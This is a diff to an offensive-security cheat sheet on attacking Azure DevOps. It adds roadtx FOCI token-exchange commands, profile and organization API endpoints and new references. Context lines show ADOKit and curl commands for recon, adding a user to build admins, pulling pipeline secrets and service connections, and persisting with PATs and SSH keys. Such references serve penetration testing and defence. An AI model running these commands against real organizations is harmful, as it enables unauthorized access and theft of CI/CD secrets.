Azure Devops

docs/cloud/azure/azure-services-devops.md

@@ -1,7 +1,9 @@
 # Azure Services - Azure DevOps
 
 * [xforcered/ADOKit](https://github.com/xforcered/ADOKit) - Azure DevOps Services Attack Toolkit
+* [zolderio/devops](https://github.com/zolderio/devops) - Azure DevOps Access Testing Scripts
 * [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.
+
     ```ps1
     # List all secrets from all projects
     $ nord-stream.py devops --token "$PAT" --org myorg --list-secrets
@@ -12,21 +14,30 @@
 
 ## Authentication
 
-You can access an organization's Azure DevOps Services instance via https://dev.azure.com/{yourorganization}. 
+You can access an organization's Azure DevOps Services instance via <https://dev.azure.com/{yourorganization}>.
 
 * Username and Password
 * Authentication Cookie `UserAuthentication`: `ADOKit.exe whoami /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization`
 * Personal Access Token (PAT): `ADOKit.exe whoami /credential:patToken /url:https://dev.azure.com/YourOrganization`
+
     ```ps1
     PAT="XXXXXXXXXXX"
     organization="YOURORGANIZATION"
     curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds
     ```
 
+* Access Token with FOCI (MS Authenticator)
+
+    ```ps1
+    roadtx auth --device-code -c 4813382a-8fa7-425e-ab75-3b753aab3abb
+    roadtx refreshtokento -c 1950a258-227b-4e31-a9cf-717495945fc2 -r 499b84ac-1321-427f-aa17-267ca6975798/.default
+    python main.py --token $(jq -r '.accessToken' .roadtools_auth) repositories
+    ```
 
 ## Recon
 
 * Search files: `file:FileNameToSearch`, `file:Test* OR file:azure-pipelines*`
+
   ```ps1
   curl -i -s -k -X $'GET'
   -H $'Content-Type: application/json'
@@ -37,6 +48,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
   ```
 
 * Search code: `ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"search term"`
+
   ```ps1
   curl -i -s -k -X $'POST'
   -H $'Content-Type: application/json'
@@ -51,6 +63,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
   ```
 
 * Enumerate users
+
   ```ps1
   curl -i -s -k -X $'GET'
   -H $'Content-Type: application/json'
@@ -61,6 +74,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
   ```
 
 * Enumerate groups: `ADOKit.exe getgroupmembers /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /group:"search term"`
+
   ```ps1
   curl -i -s -k -X $'GET'
   -H $'Content-Type: application/json'
@@ -72,10 +86,14 @@ You can access an organization's Azure DevOps Services instance via https://dev.
 
 * Enumerate project permissions: `ADOKit.exe getpermissions /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`
 
+* Get the user profile of the user from access_token: <https://app.vssps.visualstudio.com/_apis/profile/profiles/me?api-version=7.1>
+* Get the organizations that user belongs to: <https://app.vssps.visualstudio.com/_apis/accounts?memberId={UserID}?api-version=7.1>
+* Get the repositories inside of that organization: <https://dev.azure.com/{org_name}/_apis/projects?api-version=7.1>
 
 ## Privilege Escalation
 
-* Adding User to Group: `ADOKit.exe addcollectionbuildadmin /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /user:"username"` 
+* Adding User to Group: `ADOKit.exe addcollectionbuildadmin /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /user:"username"`
+
     ```ps1
     curl -i -s -k -X $'PUT'
     -H $'Content-Type: application/json'
@@ -87,6 +105,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
     ```
 
 * Retrieve build variables and secrets: `ADOKit.exe getpipelinevars /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`, `ADOKit.exe getpipelinesecrets /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`
+
     ```ps1
     curl -i -s -k -X $'GET'
     -H $'Content-Type: application/json'
@@ -97,6 +116,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
     ```
 
 * Retrieve Service Connection Information: `ADOKit.exe getserviceconnections /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /project:"project name"`
+
     ```ps1
     curl -i -s -k -X $'GET'
     -H $'Content-Type: application/json;api-version=5.0-preview.1'
@@ -106,10 +126,10 @@ You can access an organization's Azure DevOps Services instance via https://dev.
     $'https://dev.azure.com/YourOrganization/YourProject/_apis/serviceendpoint/endpoints?api-version=7.0'
     ```
 
-
 ## Persistence
 
 * Create a PAT: `ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization`
+
     ```ps1
     curl -i -s -k -X $'POST'
     -H $'Content-Type: application/json'
@@ -124,6 +144,7 @@ You can access an organization's Azure DevOps Services instance via https://dev.
     ```
 
 * Create SSH Keys: `ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh pub key"`
+
     ```ps1
     curl -i -s -k -X $'POST'
     -H $'Content-Type: application/json'
@@ -137,8 +158,8 @@ You can access an organization's Azure DevOps Services instance via https://dev.
     $'https://dev.azure.com/YourOrganization/_apis/Contribution/HierarchyQuery'
     ```
 
-
 ## References
 
 * [Hiding in the Clouds: Abusing Azure DevOps Services to Bypass Microsoft Sentinel Analytic Rules - Brett Hawkins - November 6, 2023](https://www.ibm.com/downloads/cas/5JKAPVYD)
-* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
+* [DevOps access is closer than you assume - rikvduijn - January 21, 2025](https://zolder.io/blog/devops-access-is-closer-than-you-assume/)
+* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)